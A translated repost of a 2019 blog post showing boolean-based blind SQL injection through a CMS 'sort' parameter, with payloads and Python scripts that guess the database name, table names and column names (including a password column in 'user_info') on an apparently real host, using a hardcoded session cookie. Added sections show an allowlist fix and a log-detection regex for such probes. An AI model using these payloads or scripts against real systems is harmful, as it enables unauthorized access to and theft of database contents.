Case study: Python-assisted manual SQL injection to guess the database
Published: 2019-06-11

A SQL injection vulnerability was found.

The easy route is to dump the database directly with sqlmap.

But to really understand how SQL injection works, try manual injection, with a Python script to do the guessing.

First, enable HackBar.

Get the session ID value issued after logging in to the CMS.

Now construct the SQL payloads.

Getting the length of the database name:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Manual guessing iterates from 1 upward; when the value reaches 8 the guess succeeds. A correct guess takes the THEN branch and the page responds normally; a wrong guess evaluates the ELSE branch, whose subquery returns more than one row and makes the query fail, so the response differs (the scripts below tell the two apart by response length).

The tedious part of manual SQL injection is this guessing process: a lot of repetitive work, which is why it is worth automating in Python.

The script is as follows:

# -*- encoding:utf-8 -*-
# Guess the length of database() (the same loop works for user(): swap the payload)
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'

for i in range(1, 300):
    # Payload: length of the database name
    body = {
        'page': '1', 'rows': '15', 'order': 'desc',
        'sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)
    }
    # Alternative payload: number of tables in the database
    # body = {
    #     'page': '1', 'rows': '15', 'order': 'desc',
    #     'sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)
    # }
    rs = requests.request("POST", url, cookies=cookies, params=body)
    length = len(rs.content)
    # A 9459-byte response means the CASE took the THEN branch, so the guess is right
    if length == 9459:
        print("数据库长度为:%d" % i)
        print(rs.text)
        break
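Why the sort parameter is exploitable and how to close it, as an added example that is not code from the post: a list query built by splicing the client's sort value into ORDER BY, next to the same query built from an allowlist, both run against an in-memory SQLite table with constructed rows. The table and column names are assumptions, and 'finance' stands in for database().

```python
import sqlite3

# Added example, not from the post.  Constructed schema: account(NAME, CREATE_DATE).
ALLOWED_SORT = {"create_date": "CREATE_DATE", "name": "NAME"}
ALLOWED_ORDER = {"asc": "ASC", "desc": "DESC"}

def build_vulnerable(sort, order):
    # ORDER BY takes identifiers, which cannot be bound as parameters, so the
    # raw value is spliced in: exactly the flaw the post's payloads rely on.
    return "SELECT NAME FROM account ORDER BY %s %s" % (sort, order)

def build_safe(sort, order):
    # Allowlist lookup: a value outside the map never reaches the engine,
    # so no CASE WHEN subquery can be smuggled into ORDER BY.
    try:
        return "SELECT NAME FROM account ORDER BY %s %s" % (
            ALLOWED_SORT[sort.lower()], ALLOWED_ORDER[order.lower()])
    except KeyError:
        raise ValueError("unsupported sort or order value")

def run(query):
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE account (NAME TEXT, CREATE_DATE TEXT)")
    con.executemany("INSERT INTO account VALUES (?, ?)",
                    [("alice", "2019-02-01"), ("bob", "2019-01-01")])
    return [row[0] for row in con.execute(query)]

def length_probe(guess):
    # One bit per request: a true guess sorts by NAME, a false one by
    # CREATE_DATE, so the row order reveals which branch ran.  The post's
    # payloads leak the same bit through an error instead of an ordering.
    sort = ("(CASE WHEN (length('finance')=%d) THEN NAME "
            "ELSE CREATE_DATE END)" % guess)
    return run(build_vulnerable(sort, "desc"))

def safe_rejects(sort, order):
    try:
        build_safe(sort, order)
        return False
    except ValueError:
        return True
```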

Guessing the full database name

Payload:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

In substr(database(),1,1), the first 1 is the position within the string and the second 1 is how many characters to take, so the name can be guessed one character at a time.

# -*- encoding:utf-8 -*-
# Guess database() one character at a time
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'
# dic1 = '3_abcdefghijklmnopqrstuvwxyz'
# Candidate characters; raw string so the backslash stays literal
dic = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\|[{?>=<;:/.-,+*)('&%$#@!"
print(len(dic))
string = ''

for i in range(1, 92):
    found = False
    for j in dic:
        body = {
            'page': '1', 'rows': '15', 'order': 'desc',
            'sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format(i, ord(j))
        }
        rs = requests.request("POST", url, cookies=cookies, params=body)
        length = len(rs.content)
        print(body)
        # A 9459-byte response means this character matched
        if length == 9459:
            print("数据库第%d个字符是:%s:" % (i, j))
            string += j
            found = True
            break
    print("数据库是:%s" % string)
    # No candidate matched at this position: the end of the name was reached
    if not found:
        break
print("数据库是:%s" % string)


Guessing table names:

1. Guess the length of the 204th table name:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

# -*- encoding:utf-8 -*-
# Guess the length of the 204th table name
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'

for i in range(1, 300):
    # Earlier payloads from the scripts above, kept for reference:
    # length of the database name
    # 'sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)
    # number of tables in the database
    # 'sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)
    # Payload: length of the 204th table name
    body = {
        'page': '1', 'rows': '15', 'order': 'desc',
        'sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)
    }
    rs = requests.request("POST", url, cookies=cookies, params=body)
    length = len(rs.content)
    # A 9459-byte response means the CASE took the THEN branch, so the guess is right
    if length == 9459:
        print("表名长度为:%d" % i)  # the original message said 数据库长度, which was copied from the first script
        print(rs.text)
        break

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

1 is the position of the first character of the table name.

204 is the 204th table in the database.

117 is the ASCII code of the first character.
Guessing column names:

1. First guess the number of columns in the table:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=36) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

2. Guess the columns one by one:

Guessing the password column:

Guess the length of the first column of the 204th table, user_info:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=7) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Guess the name of the first column:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

The first character of the column name is guessed as ASCII code 85.
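On the defending side, these probes stand out in access logs because a sort parameter should never contain SQL. The detector below is an added example, not code from the post; its log lines, client addresses and probe regex are constructed for this example, modelled on the request shape used throughout.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not from the post.  Three constructed combined-log lines:
# one legitimate request and two database-length probes (URL-encoded).
LOG_LINES = [
    '10.0.0.5 - - [11/Jun/2019:10:00:01 +0800] "POST /finance/account/accountList'
    '?page=1&rows=15&order=desc&sort=CREATE_DATE HTTP/1.1" 200 9459',
    '10.0.0.9 - - [11/Jun/2019:10:00:02 +0800] "POST /finance/account/accountList'
    '?page=1&rows=15&order=desc&sort=CREATE_DATE%2C%28SELECT+%28CASE+WHEN+%28length'
    '%28database%28%29%29%3D7%29+THEN+9441+ELSE+9441%2A%28SELECT+9441+FROM+'
    'INFORMATION_SCHEMA.CHARACTER_SETS%29+END%29%29 HTTP/1.1" 500 1203',
    '10.0.0.9 - - [11/Jun/2019:10:00:03 +0800] "POST /finance/account/accountList'
    '?page=1&rows=15&order=desc&sort=CREATE_DATE%2C%28SELECT+%28CASE+WHEN+%28length'
    '%28database%28%29%29%3D8%29+THEN+9441+ELSE+9441%2A%28SELECT+9441+FROM+'
    'INFORMATION_SCHEMA.CHARACTER_SETS%29+END%29%29 HTTP/1.1" 200 9459',
]

# Combined-log shape: client, method, request target, status, response bytes.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) (\d+)')
# A sort parameter should only ever hold column names; these tokens never belong.
PROBE_RE = re.compile(r"\bcase\s+when\b|information_schema|\bsubstr\s*\(|"
                      r"database\s*\(\s*\)|\bselect\b", re.I)

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status, size = m.groups()
    params = parse_qs(urlsplit(target).query)   # parse_qs URL-decodes the values
    return {"ip": ip, "status": int(status), "size": int(size),
            "sort": params.get("sort", [""])[0]}

def is_probe(rec):
    return rec is not None and PROBE_RE.search(rec["sort"]) is not None

def probe_report(lines):
    # Per client: how many probes, and which status codes they drew.  A long
    # run from one client that alternates 500 and 200 while only a number in
    # the payload changes is the guessing loop from the scripts above.
    report = {}
    for rec in (parse(line) for line in lines):
        if is_probe(rec):
            entry = report.setdefault(rec["ip"], {"probes": 0, "statuses": set()})
            entry["probes"] += 1
            entry["statuses"].add(rec["status"])
    return report
```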

Reposted from: https://www.cnblogs.com/qmfsun/p/7606108.html
